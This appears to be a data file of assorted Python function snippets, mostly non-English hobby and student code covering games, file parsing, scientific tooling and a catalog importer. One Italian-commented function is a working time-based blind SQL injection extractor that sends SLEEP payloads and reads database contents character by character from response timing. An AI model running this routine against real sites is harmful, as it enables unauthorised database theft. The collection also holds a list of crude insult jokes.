preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def func_piezo(self,piezo):\n self.write('SOURce:VOLTage:PIEZo '+str(piezo))\n self.read()", "def geneA(nombreA,listaPGA): #Esta sección fue hecha por Ángel\n with open(nombreA + \".txt\", \"w\") as archivo:\n archivo.writelines(listaPGA)", "def mostrarSiglas(cadena):\n cadena_final = \"\"\n palabras = cadena.split(\" \")\n lista_iniciales = []\n for palabra in palabras: # recorro la palabra separada y saco la primera letra\n lista_iniciales.append(palabra[0])\n return cadena_final.join(lista_iniciales) # y aca devuelo la lisa convertida en str", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def psea(pname): # -> str:\n ...", "def cargar_mapa (self):\n\n stream_cargar = open ('yo_mapa.txt', 'rt',encoding=\"utf-8\")\n mapa=stream_cargar.readlines()\n \n a = mapa[0].split(\"X\")\n mapa__I=[]\n mapa__D=[]\n toca = \"izda\"\n for lista in a:\n pasar=\"X\"\n linea1=[]\n trozo=\"\"\n for i in lista:\n if pasar==\"X\":\n \n borrar = [\"[\",\"'\"]\n if i in borrar:\n pass\n elif i == \",\" or i == \"]\":\n linea1.append(trozo)\n trozo=\"\"\n pasar=\"V\"\n elif i == \"S\":\n toca=\"dxa\"\n else:\n trozo+=i\n\n else:\n pasar=\"X\"\n pass\n if toca == \"izda\":\n mapa__I.append(linea1)\n else:\n mapa__D.append(linea1)\n\n mapa_cargado=[]\n for i in range (len(mapa__I)):\n\n mapa_cargado.append(mapa__I[i]+mapa__D[i]) \n\n stream_cargar=(close)\n return mapa_cargado", "def getAll(nombre, apellidos):\n texto = getNombre(nombre) + '\\n' + getApellidos(apellidos) \n return texto\n pass", "def ricostruisciParolaGET(length, nomeTabella, nomeColonna, indice,condizioneWhere):\n # la funzione mid funzione in modo particolare l'indice parte da 1 e arriva fino all'effettiva lunghezza\n # della stringa\n\n value = \"\"\n for i in range(1, length + 1):\n trovato = False\n min = 0\n max = 256\n\n if (OptionConfiguration.typeOfValue == \"string\"):\n\n while (trovato == False):\n\n if (min <= max):\n # print (min,max)\n mid= min+int((max-min)//2)\n dataToSent = OptionConfiguration.data.copy()\n # modifico il valore injectable\n if(condizioneWhere==None):\n\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n else:\n\n 
dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, condizioneWhere,indice, i,\n mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n data=creaStringaGet(dataToSent)\n #print (data)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n #print (end-start),chr(mid),req.elapsed.total_seconds()\n\n if ((end - start) >= OptionConfiguration.timeToWait):\n data = creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n if ((end - start) >= OptionConfiguration.timeToWait):\n # carattere trovato\n trovato = True\n value = value + chr(mid)\n print chr(mid),\n break\n else:\n dataToSent = OptionConfiguration.data.copy()\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella,\n condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n data=creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start )>= OptionConfiguration.timeToWait):\n data = creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) >= OptionConfiguration.timeToWait):\n min = mid + 1\n # sono nella meta inferiore\n else:\n max = mid-1\n else:\n break\n\n\n # parametro intero\n else:\n\n while (trovato == False):\n if (min <= max):\n # print (min,max)\n mid= min+int((max-min)//2)\n dataToSent = OptionConfiguration.data.copy()\n\n # modifico il valore injectable\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) = %s \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, condizioneWhere,indice, i,\n mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n\n data=creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n if ((end - start) >= OptionConfiguration.timeToWait):\n data = 
creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n if ((end - start) >= OptionConfiguration.timeToWait):\n # carattere trovato\n trovato = True\n value = value + chr(mid)\n print chr(mid),\n break\n\n else:\n dataToSent = OptionConfiguration.data.copy()\n\n if(condizioneWhere==None):\n\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) > %s \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s)\" % (\n OptionConfiguration.timeToWait)\n else:\n\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella,\n condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n\n data=creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start )>= OptionConfiguration.timeToWait):\n\n data = creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) >= OptionConfiguration.timeToWait):\n\n min = mid + 1\n # sono nella meta inferiore\n\n else:\n max = mid-1\n else:\n print (OptionConfiguration.bcolors.BOLD + OptionConfiguration.bcolors.FAIL + \"Error value no find \" + OptionConfiguration.bcolors.ENDC)\n\n break\n\n print(\"\")\n print (OptionConfiguration.bcolors.BOLD+\"value find -> \"+value+OptionConfiguration.bcolors.ENDC)\n print(\"\")\n return value", "def put_str(file,tupla): \n if type(tupla)!=type((2,)):\n raise 'Need a tuple of variables'\n f=open(file,'w') \n for i in range(1,len(tupla)):\n if len(tupla[i])!=len(tupla[0]):\n raise 'Variable lists have different lenght'\n for i in range(len(tupla[0])):\n cosas=[]\n for j in range(len(tupla)):cosas.append(str(tupla[j][i]))\n f.write(join(cosas)+'\\n')\n f.close()", "def convert_txt_to_data():\n pass", "def tous_les_codages(nom_de_fichier1,nom_de_fichier2):\n with open(nom_de_fichier1,'r') as f :\n texte = f.read()\n for clef in range(26):\n texte_code = codage_texte(texte,clef)\n with open(nom_de_fichier2+'_{}'.format(transforme(clef))+'.txt','w') as f :\n f.write(texte_code)\n return None", "def load_PIC(self, edron: Dict[str, str]) -> None:\n ...", "def load():\n messagebox.showinfo(\"Information\", \"Veuillez entrer le nom du fichier dans la console.\")\n file_name = input(\"Nom du fichier : \")\n ferme_fenetre()\n Hitori(file_name)", "def jogo_do_galo(str1, str2):\r\n if not (str1 in ['X','O'] and type(str1)==str) or not (str2 in ['basico','normal','perfeito'] and type(str2)==str):\r\n raise ValueError('jogo_do_galo: algum dos argumentos e invalido')\r\n else:\r\n print(\"Bem-vindo ao JOGO DO GALO.\\nO jogador joga com '{}'.\".format(str1))\r\n tab = ((0,0,0),(0,0,0),(0,0,0))\r\n if str1=='X':\r\n jog = 1\r\n pos = escolher_posicao_manual(tab)\r\n tab = marcar_posicao(tab,jog,pos)\r\n print(tabuleiro_str(tab))\r\n else:\r\n jog = -1\r\n while len(obter_posicoes_livres(tab))!=0:\r\n print('Turno do computador 
({}):'.format(str2))\r\n pos = escolher_posicao_auto(tab, -1*jog, str2)\r\n tab = marcar_posicao(tab,-1*jog,pos)\r\n print(tabuleiro_str(tab))\r\n if jogador_ganhador(tab) in [-1,1] or len(obter_posicoes_livres(tab))==0:\r\n break\r\n pos = escolher_posicao_manual(tab) \r\n tab = marcar_posicao(tab,jog,pos)\r\n print(tabuleiro_str(tab)) \r\n if jogador_ganhador(tab) in [-1,1] or len(obter_posicoes_livres(tab))==0:\r\n break\r\n \r\n if jogador_ganhador(tab) == 1:\r\n return 'X'\r\n elif jogador_ganhador(tab) == -1:\r\n return 'O' \r\n else:\r\n return 'EMPATE'", "def afficher_damier_ascii(infojeu):\n lignes = []\n lignes += list(\"Légende: 1=\"+ str(infojeu[\"joueurs\"][0][\"nom\"])+\n ', 2='+str(infojeu[\"joueurs\"][1][\"nom\"]) + \"\\n\")\n lignes += list(\" \"+\"-\"*35+\"\\n\")\n for i in range(1, 10):\n lignes += str(10-i) + \" | \"\n for j in range(1, 9):\n strplayer = \".\"\n if [j, 10-i] == infojeu[\"joueurs\"][0][\"pos\"]:\n strplayer = \"1\"\n elif [j, 10-i] == infojeu[\"joueurs\"][1][\"pos\"]:\n strplayer = \"2\"\n if [j+1, 10-i] in infojeu[\"murs\"][\"verticaux\"]:\n lignes += list(strplayer + \" | \")\n elif [j+1, 9-i] in infojeu[\"murs\"][\"verticaux\"]:\n lignes += list(strplayer + \" | \")\n else:\n lignes += list(strplayer + \" \")\n if [9, 10-i] == infojeu[\"joueurs\"][0][\"pos\"]:\n lignes += list(\"1 |\")\n elif [9, 10-i] == infojeu[\"joueurs\"][1][\"pos\"]:\n lignes += list(\"2 |\")\n else:\n lignes += list(\". |\")\n if i != 9:\n lignes += list(\"\\n |\")\n for k in range(1, 9):\n if i != 9:\n if [k, 10-i] in infojeu[\"murs\"][\"horizontaux\"]:\n lignes += list(\"----\")\n elif [k-1, 10-i] in infojeu[\"murs\"][\"horizontaux\"] and \\\n [k+1, 9-i] in infojeu[\"murs\"][\"verticaux\"]:\n lignes += list(\"---|\")\n elif [k-1, 10-i] in infojeu[\"murs\"][\"horizontaux\"]:\n lignes += list(\"--- \")\n elif [k+1, 9-i] in infojeu[\"murs\"][\"verticaux\"]:\n lignes += list(\" |\")\n else:\n lignes += list(\" \")\n if i != 9:\n if [8, 10-i] in infojeu[\"murs\"][\"horizontaux\"]:\n lignes += list(\"---|\")\n else:\n lignes += list(\" |\")\n lignes += list(\"\\n\")\n lignes += list(\"--|\"+ \"-\"*35+\"\\n\")\n lignes += list(\" | 1 2 3 4 5 6 7 8 9\")\n lignes = ''.join(lignes)\n print(lignes)", "def cliquer_sur_unité(self):", "def codifica_fraza(fraza: str, codificare: str) -> str:\n fraza_codificata = \"\"\n for litera in fraza:\n fraza_codificata += codificare[ord(litera) - 97]\n return fraza_codificata", "def crearLBI(): # Esta sección fue hecha por Ángel\n with open(\"Inventario.txt\",\"r\") as myFile:\n dataString = myFile.readlines()\n \n dataNoBS = [] \n for elem in dataString:\n noBS = elem.rstrip()\n dataNoBS.append(noBS.split(\",\"))\n \n listaFinall = [] \n for elementos in dataNoBS:\n productt = elementos[0]\n precio = elementos[1]\n cantidad = int(elementos[2])\n categoria = elementos[3]\n listaFinall.append([productt,precio,cantidad,categoria])\n return listaFinall", "def localizar(self, nome, comando):\n local = self.orm.get_global(nome).local\n if 'info' in comando:\n return f'Descricao do local: {self.orm.get_mapa(local).info}'\n return f'voçê atualmente está {self.orm.get_mapa(local).nome_amigavel.split(\"|\")[1]}. 
' + \\\n f'Voce pode ir para: {list(json.loads(self.orm.get_mapa(local).saidas).keys())}'", "def __str__(self):\t\t\n\t\tcadena = []\n\t\tactual = self.prim\t\t\n\t\twhile actual:\n\t\t\tif type(actual.dato) == str:\n\t\t\t\tcadena.append(\"'\" + str(actual.dato) + \"'\")\n\t\t\telse:\t\n\t\t\t\tcadena.append(str(actual.dato))\n\t\t\tactual = actual.prox\n\t\treturn \"[\" + \", \".join(cadena) + \"]\"", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)", "def gerarPalavraSecreta():\n global palavraOculta\n for _ in range(len(palavraDoJogo)):\n palavraOculta += '*'\n print(palavraOculta)", "async def tamere(self):\n tamere = [\n \"Ta mère est tellement grosse que pour la voir entièrement, on doit reculer de trois pas.\",\n \"Ta mère est tellement grosse qu'il faut deux pokéflutes pour la réveiller.\",\n \"Ta mère est tellement grosse qu'il y a un décalage horaire entre ses deux fesses.\",\n \"Ta mère est tellement radine que, quand elle vomit, elle sert les dents pour garder les morceaux.\",\n \"Ta mère est tellement moche que ton père est capable de l'emmener au travail pour éviter de lui dire au revoir en l'embrassant.\",\n \"Ta mère est tellement vieille que quand elle pète, elle fait de la poussière.\",\n \"Ta mère est tellement desséchée que ses morpions ne se baladent jamais sans leur gourde perso.\",\n \"Ta mère est tellement grosse qu'elle a décroché le rôle de la grosse pierre roulante au casting d'Indiana Jones.\",\n \"Ta mère est tellement grosse qu'elle a été baptisée en mer.\",\n \"Ta mère est tellement pauvre que ce sont les pigeons qui lui jettent du pain.\",\n \"Ta mère est tellement moche que quand elle va à la banque ils coupent les caméras.\",\n \"Ta mère est tellement grosse que quand elle met des talons aiguilles, elle trouve du pétrole !\",\n \"Ta mère est tellement petite que sa tête pue des pieds.\",\n \"Ta mère est tellement vieille qu'elle fait du lait en poudre.\",\n \"Ta mère a tellement mauvaise haleine qu'on a l'impression qu'elle a l'anus derrière les dents.\",\n \"Si tu vois un bateau qui flotte sur l'eau c'est que ta mère n'est pas à bord.\",\n \"Ta mère est tellement grosse que lorsqu'elle tombe du lit elle tombe des deux bords.\",\n \"Ta mère est tellement grosse que pour la photographier il faut un satellite.\",\n \"Ta mère est tellement grosse que quand elle mange des cacahuètes, elle chie des Snickers.\",\n \"Ta mère est tellement grosse que lorsqu'elle se pèse, c'est son numéro de téléphone qui s'affiche !\",\n \"Si les femmes sont des fleurs, il faudrait changer l'eau de ta mère.\",\n \"Ta mère est tellement bête 
que quand ton père l'a demandée en mariage elle a dit oui\"\n ]\n print('Blague sur les daronnes')\n await self.bot.say(random.choice(tamere))", "def PPString(inp, mol, i, n, outFile):\n alchemy = re.compile('^\\w*2\\w*_\\d\\d\\d$')\n ppstr = re.sub('\\*', '', mol.string[i])\n if ppstr:\n PPStr = ppstr\n pp_root, pp_ext = os.path.split(ppstr)\n else:\n if inp.setting['pp_type'] == 'geodecker':\n element = mol.type_list[i].title()\n if 'd_shell' in inp.setting:\n if type(inp.setting['d_shell']) is not list:\n inp.setting['d_shell'] = [inp.setting['d_shell']]\n if qtk.n2ve(mol.type_list[i].title()) > 10:\n shell = '-d'\n elif 'd_shell' in inp.setting \\\n and element in inp.setting['d_shell']:\n shell = '-d'\n else:\n element = qtk.element[mol.type_list[i].title()]\n if element.group < 3 and mol.Z[i] > 1:\n if mol.Z[i] != 3:\n shell = '-sp'\n else:\n shell = '-s'\n else:\n shell = ''\n pp_xc_dict = {\n 'lda': 'pz',\n 'pbe0': 'pbe',\n 'b3lyp': 'blyp',\n }\n pp_xc = inp.setting['pp_theory'].lower()\n if pp_xc in pp_xc_dict:\n pp_xc = pp_xc_dict[pp_xc]\n PPStr = ''.join([c for c in mol.type_list[i] if not c.isdigit()])\\\n + '.' + pp_xc + shell + '-hgh.UPF'\n elif inp.setting['pp_type'] == 'cpmd':\n PPStr = PPName(inp, mol, i, n)\n xc = inp.setting['pp_theory'].lower()\n if not mol.string[i]:\n if inp.setting['pp_type'] == 'geodecker':\n PPCheck(pp_xc, mol.type_list[i].title(), PPStr)\n elif inp.setting['pp_type'] == 'cpmd':\n saved_pp = PPCheck_cpmd(pp_xc, mol.type_list[i].title(), PPStr)\n new_pp1 = saved_pp + '.UPF'\n conv_pp = sp.Popen(\"%s %s\" % \\\n (qtk.setting.espresso_cpmd2upf_exe, saved_pp),\n shell=True)\n conv_pp.wait()\n new_pp1_file = os.path.split(new_pp1)[1]\n new_pp1_trg = os.path.join(qtk.setting.espresso_pp, new_pp1_file)\n if not os.path.exists(new_pp1_trg):\n shutil.copy(new_pp1, qtk.setting.espresso_pp)\n PPStr = PPStr + '.UPF'\n\n elif alchemy.match(mol.string[i]):\n cpmd_pp = alchemyPP(xc, PPStr)\n new_pp1 = cpmd_pp + '.UPF'\n if not os.path.exists(new_pp1):\n qtk.report('espresso', \"rewrite Goedecker's PP to UPF\")\n conv_pp = sp.Popen(\"%s %s\" % \\\n (qtk.setting.espresso_cpmd2upf_exe, cpmd_pp),\n shell=True)\n conv_pp.wait()\n if conv_pp.returncode != 0:\n # dirty fix for espresso alchemy conversion routine\n qtk.warning('conversion failed..., trying path end points')\n root, _ = os.path.splitext(PPStr)\n element_str = re.sub('_.*', '', root)\n element1 = re.sub('2.*', '', element_str)\n element2 = re.sub('.*2', '', element_str)\n fraction = float(re.sub('.*_', '', root))/100\n if fraction == 0.0:\n strpp = element1 + \"_q\" + str(qtk.n2ve(element1)) +\\\n \"_\" + xc + '.psp'\n elif fraction == 1.0:\n strpp = element2 + \"_q\" + str(qtk.n2ve(element2)) +\\\n \"_\" + xc + '.psp'\n else:\n qtk.exit(\"PP conversion failed for intermediate lambda\")\n strpp = os.path.join(qtk.setting.cpmd_pp, strpp)\n conv_pp = sp.Popen(\"%s %s\" % \\\n (qtk.setting.espresso_cpmd2upf_exe, strpp),\n shell=True)\n conv_pp.wait()\n os.rename(strpp + '.UPF', new_pp1)\n new_pp1_file = os.path.split(new_pp1)[1]\n new_pp1_trg = os.path.join(qtk.setting.espresso_pp, new_pp1_file)\n if not os.path.exists(new_pp1_trg):\n shutil.copy(new_pp1, qtk.setting.espresso_pp)\n PPStr = PPStr + '.UPF'\n\n return PPStr", "def newprojCode_withNamed():\n\tprint \"\\n======Creando Nuevo Proyecto======\\n\"\n\n\tproject_name = raw_input(\"*Nombre del Proyecto: \").lower()\n\n\tif project_name == \"\":\n\t\tcancel()\t\t#Si project_name esta vacio, se cierra directamente la aplicacion\n\n\tproject_languges = 
raw_input(\"*Lenguaje: \").upper()\n\tpname = project_name\n\n\tprint \"\\n==================================\\n\"\n\n\tdirectory = str(\"Project_\" + pname + \"/\")\n\n\tif os.path.exists(\"Project\"):\n\t\t#Nos ubicamos en el directorio raiz del Proyecto\n\t\tsubprocess.call([\"mkdir\", directory], shell=True)\n\t\tprint \"Creando el Directorio Raiz...\"\n\telse:\n\t\tos.mkdir(\"Project\")\n\t\tos.chdir(\"Project/\")\n\t\tsubprocess.call([\"mkdir\", directory])\n\t\tif not os.path.exists(directory):\n\t\t\tprint \"LA CARPETA {} NO EXISTE!\".format(directory)\n\t\t\tcancel()\n\t\telse:\n\t\t\tos.chdir(directory)\n\n\tprint \"Accediendo al Directorio\", dirs + \"...\"\n\tprint \"Creando el Directorio de Iconos...\"\n\tsubprocess.call(\"mkdir Iconos\", shell=True)\t\t#directorio iconos *\n\tprint \"Creando el Directorio de Debug...\"\n\tsubprocess.call(\"mkdir Debug\", shell=True)\t\t#directorio debug *\n\tprint \"Crenado el Directoiro de Scripts...\"\n\tsubprocess.call(\"mkdir Scripts\", shell=True)\t#directorio scripts *\n\tprint \"Se ha Creado el Proyecto\", pname, \"con Exito!!\"\n \n\t#Se crea el codigo de verificacion del proyecto\n\tfor i in range(0, 15):\n\t\tx = random.randint(1, 10000000)\t#Calcula numeros aleatorios de 1 a 10,000,000(10 millones)\n\t\tVerifiCode = x\t\t\t\t\t#VerifiCode deja el valor de 0 y toma el valor de x\n\t\tCodeValue = bin(VerifiCode)\t\t#Encripta el codigo a binario\n\n\n\tprint \"Su codigo de proyecto es:\", CodeValue + \"\\n\"\n\tprint \"Realizando copias de archivos prioritarios a los servidores...\"\n\tpcommands.ServerCopy()\n\tprint \"Copias realizadas con exito!!\"", "def Inicio():\n menu = \"\"\"\n Bienvenido al conversor de monedas 💰\n\n 1 - Pesos colombianos\n 2 - Pesos argentinos\n 3 - Pesos mexicanos\n\n Elige una opción: \"\"\"\n\n opcion = int(input(menu))\n \n if opcion == 1:\n moneda = 'pesos colombianos'\n elif opcion == 2:\n moneda = 'pesos argentinos'\n elif opcion == 3:\n moneda = 'pesos mexicanos'\n else:\n print(f'La opción no es valida')\n\n if opcion == 1 or opcion == 2 or opcion == 3 :\n cambio = conversor(moneda)\n print(f'La cantidad de {cambio[1]} {moneda} en dólares es de {cambio[0]} USD')", "def cargar_tablero(tablero):\n try:\n if tablero == \"facil\":\n base = open(os.path.join(absolute_path,\"lib\",\"info\",\"boards\",\"facil.json\"),\"r\",encoding='utf8')\n elif tablero == \"medio\":\n base = open(os.path.join(absolute_path,\"lib\",\"info\",\"boards\",\"medio.json\"),\"r\",encoding='utf8')\n elif tablero == \"guardado\":\n base = open(os.path.join(absolute_path,\"lib\",\"info\",\"saves\",\"guardado.json\"),\"r\",encoding='utf8')\n else:\n base = open(os.path.join(absolute_path,\"lib\",\"info\",\"boards\",\"dificil.json\"),\"r\",encoding='utf8')\n tablero = json.load(base)\n tab = convertirDic(tablero)\n return tab\n except (FileNotFoundError):\n return None", "def icao(mesaj):\n fsicao = open(\"mesaj.icao_intrare\", \"w\")\n for cuvant in mesaj.split(' '):\n for litera in cuvant:\n fsicao.write(' '.join(extrage_litere(litera.lower())))\n fsicao.write(' ')\n fsicao.write('\\n')\n fsicao.close()", "def getApellidos(apellido):\n texto = f'El apellido es: {apellido}'\n return texto\n pass", "def createNew(string):\n image=Image.open('imageGenerator/images/images.jpg').convert('RGBA')\n\n fnt = ImageFont.truetype(\"fonts/arial.ttf\", 25)\n d = ImageDraw.Draw(image)\n\n d.text((10,10), string, font=fnt, fill=(255,255,255,128))\n\n d.text((10,60), \"World\", fill=(255,255,255,255))\n file=byt()\n image.save(file,'jpeg')\n return 
file.getvalue()", "def gerar_livro(nome, genero):\n if genero == \"Genérico\":\n livro = Generico(nome)\n elif genero == \"Ficção\":\n livro = Ficcao(nome)\n elif genero == \"Não Ficção\":\n livro = NaoFiccao(nome)\n elif genero == \"Técnico\":\n livro = Tecnico(nome)\n return livro", "def newprojcode(name):\n\tprint \"\\n======Creando Nuevo Proyecto======\\n\"\n\tproject_name = name\n\n\tif project_name == \"\" or project_name == None:\n\t\tcancel()\n\n\tprint \"*Nombre del Proyecto: \", project_name\n\n\tproject_languges = raw_input(\"*Lenguaje: \")\n\tpname = project_name\n\n\tprint \"\\n==================================\\n\"\n\n\tdirectory = str(\"Project_\" + pname + \"/\")\n\n\tif os.path.exists(\"Project\"):\n\t\t#Nos ubicamos en el directorio raiz del Proyecto\n\t\tsubprocess.call([\"mkdir\", directory], shell=True)\n\t\tprint \"Creando el Directorio Raiz...\"\n\telse:\n\t\tos.mkdir(\"Project\")\n\t\tos.chdir(\"Project/\")\n\t\tsubprocess.call([\"mkdir\", directory])\n\t\tif not os.path.exists(directory):\n\t\t\tprint \"LA CARPETA {} NO EXISTE!\".format(directory)\n\t\t\tcancel()\n\t\telse:\n\t\t\tos.chdir(directory)\n\n\tdirs = \"Project\" + pname + \"/\"\n\t#Nos ubicamos en el directorio raiz del Proyecto\n\tos.chdir(dirs)\n\tprint \"Accediendo al Directorio\", dirs + \"...\"\n\tprint \"Creando el Directorio de Iconos...\"\n\tsubprocess.call(\"mkdir Iconos\", shell=True)\t\t#directorio iconos *\n\tprint \"Creando el Directorio de Debug...\"\n\tsubprocess.call(\"mkdir Debug\", shell=True)\t\t#directorio debug *\n\tprint \"Crenado el Directoiro de Scripts...\"\n\tsubprocess.call(\"mkdir Scripts\", shell=True)\t#directorio scripts *\n\tprint \"Creando los Archivos XML del Proyecto...\\n\"\n\tsubprocess.call(\"source XMLProjectFiles.sh\", shell=True)\n\tprint \"Se ha Creado el Proyecto\", pname, \" con Exito!!\"\n\n\t#Se crea el codigo de verificacion del proyecto\n\tfor i in range(0, 15):\n\t\tx = random.randint(1, 1000000)\t#Calcula numeros aleatorios de 1 a 1,000,000(1 millon)\n\t\tVerifiCode = x\t\t\t\t\t#VerifiCode deja el valor de 0 y toma el valor de x\n\t\tCodeValue = bin(VerifiCode)\t\t#Encripta el codigo a binario\n\n\tprint \"Su codigo de proyecto es:\", CodeValue + \"\\n\"\n\tSaveKey(CodeValue)\n\tprint \"Realizando copias de archivos prioritarios a los servidores...\"\n\tpcommands.ServerCopy()\n\tprint \"Copias realizadas con exito!!\"", "def cabecalho(dic_cabecalho,dat_ordem,imagem):\n\n tmp=''\n tmp+='\\t\\t\\t\\t<image x=\"4.1cm\" y=\"26.9cm\" width=\"74\" height=\"60\" file=\"' + imagem + '\"/>\\n'\n tmp+='\\t\\t\\t\\t<lines>3.3cm 26.3cm 19.5cm 26.3cm</lines>\\n'\n tmp+='\\t\\t\\t\\t<setFont name=\"Helvetica-Bold\" size=\"15\"/>\\n'\n tmp+='\\t\\t\\t\\t<drawString x=\"6.7cm\" y=\"28.1cm\">' + dic_cabecalho['nom_casa'] + '</drawString>\\n'\n tmp+='\\t\\t\\t\\t<setFont name=\"Helvetica\" size=\"11\"/>\\n'\n tmp+='\\t\\t\\t\\t<drawString x=\"6.7cm\" y=\"27.6cm\">' + 'Estado de ' + dic_cabecalho['nom_estado'] + '</drawString>\\n'\n return tmp", "def mostrEmpl2(finalData): #Esta sección fue hecha por Ángel\n listaUE = []\n for elemento in finalData:\n nombre = elemento[0]\n listaUE.append(nombre) \n return listaUE", "def do_ascii(catalog):\n task_str = catalog.get_current_task_str()\n\n\n # Howerton Catalog\n datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',\n 'vizier_J_MNRAS_441_1186_table1 J_MNRAS_441_1186_table3_20200403.csv')\n data = read(datafile, format='csv')\n for rrow in pbar(data, task_str):\n row = dict((x, str(rrow[x])) for x in 
rrow.columns)\n# if any(x in row['Notes'].lower() for x in ['artifact']):\n# continue\n# ctypes = row['Type'].split('/')\n# nonsne = False\n# for ct in ctypes:\n# if ct.replace('?', '') in catalog.nonsnetypes:\n# nonsne = True\n# else:\n# nonsne = False\n# break\n# if nonsne:\n# continue\n name, source = catalog.new_entry(\n row['CRTS'],\n srcname='CRTS',\n bibcode='2014MNRAS.441.1186D')\n# if row['IAU des.'] != '--':\n# catalog.entries[name].add_quantity(SUPERNOVA.ALIAS,\n# row['IAU des.'], source)\n# for ct in ctypes:\n# catalog.entries[name].add_quantity(SUPERNOVA.CLAIMED_TYPE, ct,\n# source)\n# catalog.entries[name].add_quantity(SUPERNOVA.DISCOVERER,\n# row['Discoverer'], source)\n# date = row['Discovery'].split('/')\n# date = '/'.join([date[-1].zfill(2), date[0].zfill(2), date[1]])\n# catalog.entries[name].add_quantity(SUPERNOVA.DISCOVER_DATE, date,\n# source)\n catalog.entries[name].add_quantity(CATACLYSMIC.VISUAL_MAG, row['Vmax'],\n source)\n catalog.entries[name].add_quantity(CATACLYSMIC.RA, row['RAJ2000'], source)\n catalog.entries[name].add_quantity(CATACLYSMIC.DEC, row['DEJ2000'], source)\n catalog.journal_entries()\n\n # Howerton 